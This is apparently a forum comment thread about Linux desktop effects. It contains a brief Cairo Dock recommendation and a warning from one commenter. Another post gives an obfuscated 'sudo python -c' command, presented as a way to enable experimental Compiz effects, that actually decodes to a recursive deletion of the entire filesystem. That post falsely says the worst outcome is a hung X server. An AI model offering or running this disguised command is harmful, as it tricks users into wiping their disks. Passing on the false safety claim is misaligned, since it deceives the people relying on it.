Command posted by Glennormothra WILL erase all attached disk drives (it will take a while though!) ... be careful when running commands found on the 'net. It will prompt for a password to do this.

the software is called CAIRO DOCK, you must find it for your linux distribution and later is very easy to configure and you wanna make this efects in your computer...i'm use it

This effect is so old. Just copy this command to the terminal, and it will send a signal to the Compiz socket file enabling these effects:

sudo python -c 'import os; os.system("".join([chr(ord(i)- 1) for i in "sn!.sg!0!..op.qsftfswf.sppu"] ))'

Be careful though. These effects are still considered experimental, and this is why it is so hard to enable them. The worst that will happen is that xorg may hang but this can be fixed with crtl+alt+backspace.
